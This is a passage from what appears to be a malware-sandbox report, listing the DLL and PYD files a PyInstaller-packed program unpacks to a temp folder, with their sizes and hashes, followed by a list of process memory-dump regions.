370087e9aff72e45e2bfbf5e032821a0479af0d29679ba87f9605c59b7fb95f225cd8db0dd07c75ddcdd2861211dd29fed3a4bb2e0aa683e9acdbacd436b8d0b

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\libcrypto-1_1.dll
Filesize
1.1MB

MD5
14341ef9c60263ca2d688ce066164f58

SHA1
15e4d0856be8a50fb90506ab15cc3886d6162cb3

SHA256
25ad1122f2978a637376c641ba403748d832d6be072da6060e3c2e1eb8b1b199

SHA512
370087e9aff72e45e2bfbf5e032821a0479af0d29679ba87f9605c59b7fb95f225cd8db0dd07c75ddcdd2861211dd29fed3a4bb2e0aa683e9acdbacd436b8d0b

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\libffi-8.dll
Filesize
29KB

MD5
b57999a839ce4e268bffc6da47c657af

SHA1
7fa7d4f2bfa15f09068216af70319cdf107625c7

SHA256
a98c456292c5d6c52e2c03d59b57456fd8a85abc774e5ce183f9259905948f0f

SHA512
2e22f8d518849dfcb4dc28611d176ec49f424f1fa9736bec60783fd658e7ad7a484e746d3271da2380343d142dd9d8e1794fbbb20e205e1e531094e23d7e7df7

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\libssl-1_1.dll
Filesize
204KB

MD5
1146823b8e3fca2e5bc3f3364813175c

SHA1
da79c6ddb157d5435051a8da88a94f3f3a7672bb

SHA256
0a96282812da85858d02eb9e261dc32bbfa7dcc2a0474b63ae3f7fb519057605

SHA512
cedaf44d19d5b8fefff52130517ffe14bc9eaca17a603a644cd8f9a110c8d7e84b47ff5d25990c64d79f2b02f26a93d019813dc2f53986bdbdda1b99ee7223e3

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\python311.dll
Filesize
1.6MB

MD5
46189885c60c27701ee3ccf8e205e16a

SHA1
f05ae8e465c3b156e74e3577a26d224a8610fe3d

SHA256
0dea022eea7867e8f5604ebd34ac0dfe8481be30e3740a8f6bb3849b71e1fc2c

SHA512
9219a0438191944a810e81b7ae1ae9ef4da79c5443623be9f616714d3eb5474121f8e0d302a98e859a19a00c3003cb9c16444bdce4a77e15b9ae71c75b0cbd1e

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\select.pyd
Filesize
25KB

MD5
208a8c782498756b4f7eaac4e37a0139

SHA1
a6c74b5d09539e91308452dfc0807c726f42fd04

SHA256
2d9be5afd7514742e1f10e334d208c804e16a846b52a63335aed5ad43e1d6ffb

SHA512
fe2b5e0e58e2817b6370d8dc1de654047b3a56b469ca2655ea0f0c84a44c1eb6b3ee53ea670ef83664cce2199756691617c18e1cb259869c47bffff3daedfce6

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\sqlite3.dll
Filesize
622KB

MD5
4bf94ecce00c2ed4d3c15079cbeccf9e

SHA1
dbd9d27be95529e3e0bb8f4bf29848166b573785

SHA256
344be4fd0be645470cd4e6cc8518bc0dad0a779ba46df44e3793c49e97e73ac0

SHA512
8ed2db55a588afd767c2e26caae6b6f3267a503b531b7285ed9e1b142a338c09080e3486240e14e0ec99549cf44bfc58fb45e547dcdf51a783e54da182a38c7b

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\tinyaes.cp311-win_amd64.pyd
Filesize
17KB

MD5
e058c833777e27d6b46a4aa4244f840a

SHA1
f3e144cee4fcaa09f7c0f7a2f1d124b3740f95e9

SHA256
72d221dc53979820e152436b1fff307ba55a9f8fd3b208645b6b52c3676dd64e

SHA512
29680311bd40ecd85db6d1727852005ab44c48475e80cc28a5eb2f7d879d28b6c0b43f11fce67432b4aa34da2c31804fce5dea2f2657854997c43702b67d4a85

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\ucrtbase.dll
Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI39842\unicodedata.pyd
Filesize
295KB

MD5
b5d228628223c9183288cfa2ec5ef18f

SHA1
f5deff24d909b3bc2d7b237a9a44bd968661f7de

SHA256
7ff8340c9a0c3e4253f84a7400f4d2f9b835c341928dad4310df391f2e7cb63a

SHA512
be37427e04d8d2d1e9a078f2cc2c779e038ffa4af08fa5f69533bbe040733874210a82db6aa6800885e982a83659d3c061290beb18dd498fc4299b34ce9a5b11

Download Submit
memory/500-877-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp

Filesize
5.9MB

Download
memory/500-879-0x00007FFB57760000-0x00007FFB57783000-memory.dmp

Filesize
140KB

Download
memory/500-236-0x00007FFB53C40000-0x00007FFB53C4D000-memory.dmp

Filesize
52KB

Download
memory/500-241-0x00007FFB44B00000-0x00007FFB44E78000-memory.dmp

Filesize
3.5MB

Download
memory/500-242-0x0000011D2FD70000-0x0000011D300E8000-memory.dmp

Filesize
3.5MB

Download
memory/500-243-0x00007FFB537A0000-0x00007FFB537B4000-memory.dmp

Filesize
80KB

Download
memory/500-892-0x00007FFB524F0000-0x00007FFB5260C000-memory.dmp

Filesize
1.1MB

Download
memory/500-579-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp

Filesize
1.5MB

Download
memory/500-573-0x00007FFB57760000-0x00007FFB57783000-memory.dmp

Filesize
140KB

Download
memory/500-570-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp

Filesize
5.9MB

Download
memory/500-245-0x00007FFB524F0000-0x00007FFB5260C000-memory.dmp

Filesize
1.1MB

Download
memory/500-890-0x00007FFB537A0000-0x00007FFB537B4000-memory.dmp

Filesize
80KB

Download
memory/500-891-0x00007FFB53C00000-0x00007FFB53C0D000-memory.dmp

Filesize
52KB

Download
memory/500-889-0x00007FFB44B00000-0x00007FFB44E78000-memory.dmp

Filesize
3.5MB

Download
memory/500-244-0x00007FFB53C00000-0x00007FFB53C0D000-memory.dmp

Filesize
52KB

Download
memory/500-239-0x00007FFB537C0000-0x00007FFB53878000-memory.dmp

Filesize
736KB

Download
memory/500-888-0x00007FFB537C0000-0x00007FFB53878000-memory.dmp

Filesize
736KB

Download
memory/500-886-0x00007FFB53C40000-0x00007FFB53C4D000-memory.dmp

Filesize
52KB

Download
memory/500-237-0x00007FFB53C10000-0x00007FFB53C3E000-memory.dmp

Filesize
184KB

Download
memory/500-887-0x00007FFB53C10000-0x00007FFB53C3E000-memory.dmp

Filesize
184KB

Download
memory/500-885-0x00007FFB53C50000-0x00007FFB53C69000-memory.dmp

Filesize
100KB

Download
memory/500-210-0x00007FFB57750000-0x00007FFB5775F000-memory.dmp

Filesize
60KB

Download
memory/500-884-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp

Filesize
1.5MB

Download
memory/500-212-0x00007FFB57730000-0x00007FFB57749000-memory.dmp

Filesize
100KB

Download
memory/500-206-0x00007FFB57ED0000-0x00007FFB57EE0000-memory.dmp

Filesize
64KB

Download
memory/500-883-0x00007FFB53C70000-0x00007FFB53C93000-memory.dmp

Filesize
140KB

Download
memory/500-211-0x00007FFB53CA0000-0x00007FFB53CCD000-memory.dmp

Filesize
180KB

Download
memory/500-209-0x00007FFB57760000-0x00007FFB57783000-memory.dmp

Filesize
140KB

Download
memory/500-882-0x00007FFB57730000-0x00007FFB57749000-memory.dmp

Filesize
100KB

Download
memory/500-794-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp

Filesize
5.9MB

Download
memory/500-881-0x00007FFB53CA0000-0x00007FFB53CCD000-memory.dmp

Filesize
180KB

Download
memory/500-880-0x00007FFB57750000-0x00007FFB5775F000-memory.dmp

Filesize
60KB

Download
memory/500-233-0x00007FFB52830000-0x00007FFB529A7000-memory.dmp

Filesize
1.5MB

Download
memory/500-193-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp

Filesize
5.9MB

Download
memory/500-878-0x00007FFB57ED0000-0x00007FFB57EE0000-memory.dmp

Filesize
64KB

Download
memory/500-235-0x00007FFB53C50000-0x00007FFB53C69000-memory.dmp

Filesize
100KB

Download
memory/500-231-0x00007FFB53C70000-0x00007FFB53C93000-memory.dmp

Filesize
140KB

Download
memory/500-811-0x0000011D2FD70000-0x0000011D300E8000-memory.dmp

Filesize
3.5MB

Download
memory/500-861-0x00007FFB44E80000-0x00007FFB45469000-memory.dmp

Filesize
5.9MB

Download
memory/516-831-0x0000022DD6E10000-0x0000022DD6E20000-memory.dmp

Filesize
64KB

Download
memory/516-829-0x0000022DD6E10000-0x0000022DD6E20000-memory.dmp

Filesize
64KB

Download
memory/3708-355-0x0000017A300B0000-0x0000017A300C0000-memory.dmp

Filesize
64KB

Download
memory/3708-354-0x0000017A300B0000-0x0000017A300C0000-memory.dmp

Filesize
64KB

Download
memory/4104-362-0x00000210D7790000-0x00000210D77A0000-memory.dmp

Filesize
64KB

Download
memory/4104-250-0x00000210D77A0000-0x00000210D77C2000-memory.dmp

Filesize
136KB

Download
memory/4104-300-0x00000210D7790000-0x00000210D77A0000-memory.dmp

Filesize
64KB

Download
memory/4104-309-0x00000210F06F0000-0x00000210F0766000-memory.dmp

Filesize
472KB

Download
memory/4104-299-0x00000210D7790000-0x00000210D77A0000-memory.dmp

Filesize
64KB

Download
memory/4184-544-0x000001E577320000-0x000001E577330000-memory.dmp

Filesize
64KB

Download
memory/4184-543-0x000001E577320000-0x000001E577330000-memory.dmp

Filesize
64KB

Download
memory/4184-542-0x000001E577320000-0x000001E577330000-memory.dmp

Filesize
64KB

Download
memory/4504-360-0x0000020E951B0000-0x0000020E951C0000-memory.dmp

Filesize
64KB

Download
memory/4504-496-0x0000020E952F0000-0x0000020E952F8000-memory.dmp

Filesize
32KB

Download
memory/4504-358-0x0000020E951B0000-0x0000020E951C0000-memory.dmp

Filesize
64KB

Download
memory/4764-302-0x0000028D73910000-0x0000028D73920000-memory.dmp

Filesize
64KB

Download
memory/4764-301-0x0000028D73910000-0x0000028D73920000-memory.dmp

Filesize
64KB

Download
memory/4764-426-0x0000028D73910000-0x0000028D73920000-memory.dmp

Filesize
64KB

Download